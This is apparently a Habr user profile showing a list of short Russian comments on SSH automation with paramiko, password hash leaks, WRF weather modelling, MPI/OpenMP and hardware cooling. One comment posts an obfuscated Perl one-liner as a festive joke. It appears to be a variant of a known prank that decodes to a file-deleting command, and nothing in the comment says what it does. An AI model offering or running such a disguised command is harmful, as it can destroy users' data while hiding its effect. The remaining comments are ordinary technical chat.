Pull to refresh
30
0
Send message
Да, судя по сырцам, умеет и очень давно. «Лапки» )
Спасибо, исправил.
Это атавизм, сохранившийся с тех времён, когда доклад был наброском на маркерной доске. Хотелось осветить особенности работы с HTTPS, SNI и т.д., но в итоговую версию это не попало.
Едва ли это блог. Evernote в состоянии выделить отдельную машину под блог. А учитывая, что блог связан более с маркетингом, чем с предоставлением услуг, вероятно, занимается им отдельные люди.
> Возможно, я недоразобрался, но у меня не получилось получить права рута на уделенном сервере.

Не работать может по нескольким причинам, вероятно stderr.read() вернет 'sudo: no tty present and no askpass program specified\n', т.е. нужен псевдотерминал.

У SSHClient нет (или я плохо искал?) возможности получить pty, но можно воспользоваться классом Channel, экземпляр которого легко получить из SSHClient. Код ниже иллюстрирует данный способ:

import paramiko
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(...)
channel = сlient.get_transport().open_session()
channel.get_pty()
channel.settimeout(5)
channel.exec_command('sudo ls')
channel.send(password+'\n')
print channel.recv(1024)
channel.close()
client.close()

Код отлаживал в терминале, кажется ничего не пропустил при копировании. В реальных условиях нужно смотреть, что sudo отдает в stdin и stderr и писать в stdin только в ответ на «вопросы».
Таки нет, празднично :)
echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;:<).>|{(!::]|=]=!\$-).|\$!]{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
На нескольких виртуалках ява «ушла в себя», потребляя весь доступный ресурс CPU.
Напоминает одну из игр, которая шла с установщиком ASPLinux.
Пользователи не редко используют один пароль везде, не солёные хэши от словарных паролей ломаются довольно быстро. Если хэши солёные, то взломщики получили не более чем БД «живых» e-mail.
Это несколько сложнее, чем слить БД, плюс «взломан» != получен root.
Понятно, значит с MPI особых проблем нет, в отличии от OpenMP.

Касаемо «быстрых» компиляторов, какой выигрыш по времени? Если не ошибаюсь, на RegCM (тогда ещё 3) переход gfortran => intel fortran дал уменьшение времени расчета процентов на 10, как не меньше.
Насколько я понимаю, у вас оно работает с MPI? Или OpenMP?
На сайте WRF выложены тестовые данные, дабы можно было убедиться, что собранная модель считает погоду не на Марсе, а в целевом регионе. Вы эти тесты выполняли? Можете что-то сказать о результатах сравнения?
Давая хорошие результаты на разрешении в 10 км, на 1км модель даст кашу. Да и с точными данными о «региональных особенностях» проблемы, ну положим рельеф — SRTM (~90м), растительность — MODIS (правда уже 250м, в лучшем случае), а вот с почвами загвоздка…
За то есть возможность получить IPv6 адрес через Teredo.
Не забудьте заюзать АОН, а кто-нибудь ошибётся номером…
Пищалки из упсов вырывать нужно для конспирации :)
Тут проблема не в сисадминах, а в их начальстве.
От сухого льда будет образовываться облако углекислоты, оно должно защитить от конденсата. С жидким азотом я бы не экспериментировал, можно нечаянно отправить электронику в сверхпроводящее состояние :)

Information

Rating
Does not participate
Location
Москва, Москва и Московская обл., Россия
Works in
Date of birth
Registered
Activity